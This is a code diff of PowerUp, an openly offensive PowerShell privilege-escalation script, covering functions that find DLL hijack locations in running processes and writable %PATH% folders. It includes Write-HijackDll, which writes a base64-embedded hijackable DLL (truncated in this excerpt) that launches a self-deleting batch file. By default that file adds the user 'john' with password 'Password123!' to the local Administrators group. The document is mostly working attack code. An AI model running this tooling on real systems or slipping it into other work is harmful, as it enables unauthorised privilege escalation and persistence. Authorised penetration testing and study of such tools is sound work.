(-not $ModifiableFiles) { throw "Service binary '$($ServiceDetails.PathName)' for service $($ServiceDetails.Name) not modifiable by the current user." } @@ -2272,6 +2948,7 @@ function Restore-ServiceBinary { $Out | Add-Member Noteproperty 'ServiceName' $ServiceDetails.Name $Out | Add-Member Noteproperty 'ServicePath' $ServicePath $Out | Add-Member Noteproperty 'BackupPath' $BackupPath + $Out.PSObject.TypeNames.Insert(0, 'PowerUp.ServiceBinary.Restored') $Out } } @@ -2285,70 +2962,77 @@ function Restore-ServiceBinary { function Find-ProcessDLLHijack { <# - .SYNOPSIS +.SYNOPSIS - Finds all DLL hijack locations for currently running processes. +Finds all DLL hijack locations for currently running processes. - Author: @harmj0y - License: BSD 3-Clause +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: None - .DESCRIPTION +.DESCRIPTION - Enumerates all currently running processes with Get-Process (or accepts an - input process object from Get-Process) and enumerates the loaded modules for each. - All loaded module name exists outside of the process binary base path, as those - are DLL load-order hijack candidates. +Enumerates all currently running processes with Get-Process (or accepts an +input process object from Get-Process) and enumerates the loaded modules for each. +All loaded module name exists outside of the process binary base path, as those +are DLL load-order hijack candidates. - .PARAMETER Name +.PARAMETER Name - The name of a process to enumerate for possible DLL path hijack opportunities. +The name of a process to enumerate for possible DLL path hijack opportunities. - .PARAMETER ExcludeWindows +.PARAMETER ExcludeWindows - Exclude paths from C:\Windows\* instead of just C:\Windows\System32\* +Exclude paths from C:\Windows\* instead of just C:\Windows\System32\* - .PARAMETER ExcludeProgramFiles +.PARAMETER ExcludeProgramFiles - Exclude paths from C:\Program Files\* and C:\Program Files (x86)\* +Exclude paths from C:\Program Files\* and C:\Program Files (x86)\* - .PARAMETER ExcludeOwned +.PARAMETER ExcludeOwned - Exclude processes the current user owns. +Exclude processes the current user owns. - .EXAMPLE +.EXAMPLE - PS C:\> Find-ProcessDLLHijack +Find-ProcessDLLHijack - Finds possible hijackable DLL locations for all processes. +Finds possible hijackable DLL locations for all processes. - .EXAMPLE +.EXAMPLE - PS C:\> Get-Process VulnProcess | Find-ProcessDLLHijack +Get-Process VulnProcess | Find-ProcessDLLHijack - Finds possible hijackable DLL locations for the 'VulnProcess' processes. +Finds possible hijackable DLL locations for the 'VulnProcess' processes. - .EXAMPLE +.EXAMPLE + +Find-ProcessDLLHijack -ExcludeWindows -ExcludeProgramFiles + +Finds possible hijackable DLL locations not in C:\Windows\* and +not in C:\Program Files\* or C:\Program Files (x86)\* - PS C:\> Find-ProcessDLLHijack -ExcludeWindows -ExcludeProgramFiles +.EXAMPLE - Finds possible hijackable DLL locations not in C:\Windows\* and - not in C:\Program Files\* or C:\Program Files (x86)\* +Find-ProcessDLLHijack -ExcludeOwned - .EXAMPLE +Finds possible hijackable DLL location for processes not owned by the +current user. - PS C:\> Find-ProcessDLLHijack -ExcludeOwned +.OUTPUTS - Finds possible hijackable DLL location for processes not owned by the - current user. +PowerUp.HijackableDLL.Process - .LINK +.LINK - https://www.mandiant.com/blog/malware-persistence-windows-registry/ +https://www.mandiant.com/blog/malware-persistence-windows-registry/ #> + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [OutputType('PowerUp.HijackableDLL.Process')] [CmdletBinding()] Param( - [Parameter(Position=0, ValueFromPipeline=$True, ValueFromPipelineByPropertyName=$True)] + [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] [Alias('ProcessName')] [String[]] $Name = $(Get-Process | Select-Object -Expand Name), @@ -2367,7 +3051,9 @@ function Find-ProcessDLLHijack { # the known DLL cache to exclude from our findings # http://blogs.msdn.com/b/larryosterman/archive/2004/07/19/187752.aspx $Keys = (Get-Item "HKLM:\System\CurrentControlSet\Control\Session Manager\KnownDLLs") - $KnownDLLs = $(ForEach ($KeyName in $Keys.GetValueNames()) { $Keys.GetValue($KeyName) }) | Where-Object { $_.EndsWith(".dll") } + $KnownDLLs = $(ForEach ($KeyName in $Keys.GetValueNames()) { $Keys.GetValue($KeyName).tolower() }) | Where-Object { $_.EndsWith(".dll") } + $KnownDLLPaths = $(ForEach ($name in $Keys.GetValueNames()) { $Keys.GetValue($name).tolower() }) | Where-Object { -not $_.EndsWith(".dll") } + $KnownDLLs += ForEach ($path in $KnownDLLPaths) { ls -force $path\*.dll | Select-Object -ExpandProperty Name | ForEach-Object { $_.tolower() }} $CurrentUser = [System.Security.Principal.WindowsIdentity]::GetCurrent().Name # get the owners for all processes @@ -2381,13 +3067,11 @@ function Find-ProcessDLLHijack { $TargetProcess = Get-Process -Name $ProcessName - if($TargetProcess -and $TargetProcess.Path -and ($TargetProcess.Path -ne '') -and ($TargetProcess.Path -ne $Null)) { + if ($TargetProcess -and $TargetProcess.Path -and ($TargetProcess.Path -ne '') -and ($Null -ne $TargetProcess.Path)) { try { $BasePath = $TargetProcess.Path | Split-Path -Parent - $LoadedModules = $TargetProcess.Modules - $ProcessOwner = $Owners[$TargetProcess.Id.ToString()] ForEach ($Module in $LoadedModules){ @@ -2399,15 +3083,15 @@ function Find-ProcessDLLHijack { $Exclude = $False - if($PSBoundParameters['ExcludeWindows'] -and $ModulePath.Contains('C:\Windows')) { + if ($PSBoundParameters['ExcludeWindows'] -and $ModulePath.Contains('C:\Windows')) { $Exclude = $True } - if($PSBoundParameters['ExcludeProgramFiles'] -and $ModulePath.Contains('C:\Program Files')) { + if ($PSBoundParameters['ExcludeProgramFiles'] -and $ModulePath.Contains('C:\Program Files')) { $Exclude = $True } - if($PSBoundParameters['ExcludeOwned'] -and $CurrentUser.Contains($ProcessOwner)) { + if ($PSBoundParameters['ExcludeOwned'] -and $CurrentUser.Contains($ProcessOwner)) { $Exclude = $True } @@ -2418,6 +3102,7 @@ function Find-ProcessDLLHijack { $Out | Add-Member Noteproperty 'ProcessPath' $TargetProcess.Path $Out | Add-Member Noteproperty 'ProcessOwner' $ProcessOwner $Out | Add-Member Noteproperty 'ProcessHijackableDLL' $ModulePath + $Out.PSObject.TypeNames.Insert(0, 'PowerUp.HijackableDLL.Process') $Out } } @@ -2434,42 +3119,50 @@ function Find-ProcessDLLHijack { function Find-PathDLLHijack { <# - .SYNOPSIS +.SYNOPSIS + +Finds all directories in the system %PATH% that are modifiable by the current user. - Finds all directories in the system %PATH% that are modifiable by the current user. +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-ModifiablePath - Author: @harmj0y - License: BSD 3-Clause +.DESCRIPTION + +Enumerates the paths stored in Env:Path (%PATH) and filters each through Get-ModifiablePath +to return the folder paths the current user can write to. On Windows 7, if wlbsctrl.dll is +written to one of these paths, execution for the IKEEXT can be hijacked due to DLL search +order loading. - .DESCRIPTION +.EXAMPLE - Enumerates the paths stored in Env:Path (%PATH) and filters each through Get-ModifiablePath - to return the folder paths the current user can write to. On Windows 7, if wlbsctrl.dll is - written to one of these paths, execution for the IKEEXT can be hijacked due to DLL search - order loading. +Find-PathDLLHijack - .EXAMPLE +Finds all %PATH% .DLL hijacking opportunities. - PS C:\> Find-PathDLLHijack +.OUTPUTS - Finds all %PATH% .DLL hijacking opportunities. +PowerUp.HijackableDLL.Path - .LINK +.LINK - http://www.greyhathacker.net/?p=738 +http://www.greyhathacker.net/?p=738 #> + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [OutputType('PowerUp.HijackableDLL.Path')] [CmdletBinding()] Param() - # use -LiteralPaths so the spaces in %PATH% folders are not tokenized + # use -Literal so the spaces in %PATH% folders are not tokenized Get-Item Env:Path | Select-Object -ExpandProperty Value | ForEach-Object { $_.split(';') } | Where-Object {$_ -and ($_ -ne '')} | ForEach-Object { $TargetPath = $_ - - $ModifidablePaths = $TargetPath | Get-ModifiablePath -LiteralPaths | Where-Object {$_ -and ($_ -ne $Null) -and ($_.ModifiablePath -ne $Null) -and ($_.ModifiablePath.Trim() -ne '')} - ForEach($ModifidablePath in $ModifidablePaths) { - if($ModifidablePath.ModifiablePath -ne $Null) { + $ModifidablePaths = $TargetPath | Get-ModifiablePath -Literal | Where-Object {$_ -and ($Null -ne $_) -and ($Null -ne $_.ModifiablePath) -and ($_.ModifiablePath.Trim() -ne '')} + ForEach ($ModifidablePath in $ModifidablePaths) { + if ($Null -ne $ModifidablePath.ModifiablePath) { $ModifidablePath | Add-Member Noteproperty '%PATH%' $_ + $ModifidablePath | Add-Member Aliasproperty Name '%PATH%' + $ModifidablePath.PSObject.TypeNames.Insert(0, 'PowerUp.HijackableDLL.Path') $ModifidablePath } } @@ -2479,57 +3172,69 @@ function Find-PathDLLHijack { function Write-HijackDll { <# - .SYNOPSIS +.SYNOPSIS + +Patches in the path to a specified .bat (containing the specified command) into a +pre-compiled hijackable C++ DLL writes the DLL out to the specified ServicePath location. - Patches in the path to a specified .bat (containing the specified command) into a - pre-compiled hijackable C++ DLL writes the DLL out to the specified ServicePath location. +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: None - .DESCRIPTION +.DESCRIPTION + +First builds a self-deleting .bat file that executes the specified -Command or local user, +to add and writes the.bat out to -BatPath. The BatPath is then patched into a pre-compiled +C++ DLL that is built to be hijackable by the IKEEXT service. There are two DLLs, one for +x86 and one for x64, and both are contained as base64-encoded strings. The DLL is then +written out to the specified OutputFile. - First builds a self-deleting .bat file that executes the specified -Command or local user, - to add and writes the.bat out to -BatPath. The BatPath is then patched into a pre-compiled - C++ DLL that is built to be hijackable by the IKEEXT service. There are two DLLs, one for - x86 and one for x64, and both are contained as base64-encoded strings. The DLL is then - written out to the specified OutputFile. +.PARAMETER DllPath - .PARAMETER DllPath +File name to write the generated DLL out to. - File name to write the generated DLL out to. +.PARAMETER Architecture - .PARAMETER Architecture +The Architecture to generate for the DLL, x86 or x64. If not specified, PowerUp +will try to automatically determine the correct architecture. - The Architecture to generate for the DLL, x86 or x64. If not specified, PowerUp - will try to automatically determine the correct architecture. +.PARAMETER BatPath - .PARAMETER BatPath +Path to the .bat for the DLL to launch. - Path to the .bat for the DLL to launch. +.PARAMETER UserName - .PARAMETER UserName +The [domain\]username to add. If not given, it defaults to "john". +Domain users are not created, only added to the specified localgroup. - The [domain\]username to add. If not given, it defaults to "john". - Domain users are not created, only added to the specified localgroup. +.PARAMETER Password - .PARAMETER Password +The password to set for the added user. If not given, it defaults to "Password123!" - The password to set for the added user. If not given, it defaults to "Password123!" +.PARAMETER LocalGroup - .PARAMETER LocalGroup +Local group name to add the user to (default of 'Administrators'). - Local group name to add the user to (default of 'Administrators'). +.PARAMETER Credential - .PARAMETER Credential +A [Management.Automation.PSCredential] object specifying the user/password to add. - A [Management.Automation.PSCredential] object specifying the user/password to add. +.PARAMETER Command - .PARAMETER Command +Custom command to execute instead of user creation. - Custom command to execute instead of user creation. +.OUTPUTS + +PowerUp.HijackableDLL #> + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSAvoidUsingUserNameAndPassWordParams', '')] + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSAvoidUsingPlainTextForPassword', '')] + [OutputType('PowerUp.HijackableDLL')] [CmdletBinding()] - param( - [Parameter(Mandatory=$True)] + Param( + [Parameter(Mandatory = $True)] [String] [ValidateNotNullOrEmpty()] $DllPath, @@ -2552,7 +3257,8 @@ function Write-HijackDll { $LocalGroup = 'Administrators', [Management.Automation.PSCredential] - $Credential, + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty, [String] [ValidateNotNullOrEmpty()] @@ -2561,34 +3267,35 @@ function Write-HijackDll { function local:Invoke-PatchDll { <# - .SYNOPSIS + .SYNOPSIS - Helpers that patches a string in a binary byte array. + Helpers that patches a string in a binary byte array. - .PARAMETER DllBytes + .PARAMETER DllBytes - The binary blob to patch. + The binary blob to patch. - .PARAMETER SearchString + .PARAMETER SearchString - The string to replace in the blob. + The string to replace in the blob. - .PARAMETER ReplaceString + .PARAMETER ReplaceString - The string to replace SearchString with. + The string to replace SearchString with. #> + [OutputType('System.Byte[]')] [CmdletBinding()] - param( - [Parameter(Mandatory=$True)] + Param( + [Parameter(Mandatory = $True)] [Byte[]] $DllBytes, - [Parameter(Mandatory=$True)] + [Parameter(Mandatory = $True)] [String] $SearchString, - [Parameter(Mandatory=$True)] + [Parameter(Mandatory = $True)] [String] $ReplaceString ) @@ -2599,7 +3306,7 @@ function Write-HijackDll { $S = [System.Text.Encoding]::ASCII.GetString($DllBytes) $Index = $S.IndexOf($SearchString) - if($Index -eq 0) { + if ($Index -eq 0) { throw("Could not find string $SearchString !") } @@ -2610,11 +3317,11 @@ function Write-HijackDll { return $DllBytes } - if($PSBoundParameters['Command']) { + if ($PSBoundParameters['Command']) { $BatCommand = $Command } else { - if($PSBoundParameters['Credential']) { + if ($PSBoundParameters['Credential']) { $UserNameToAdd = $Credential.UserName $PasswordToAdd = $Credential.GetNetworkCredential().Password } @@ -2623,7 +3330,7 @@ function Write-HijackDll { $PasswordToAdd = $Password } - if($UserNameToAdd.Contains('\')) { + if ($UserNameToAdd.Contains('\')) { # only adding a domain user to the local group, no user creation $BatCommand = "net localgroup $LocalGroup $UserNameToAdd /add" } @@ -2637,24 +3344,24 @@ function Write-HijackDll { $DllBytes32 = "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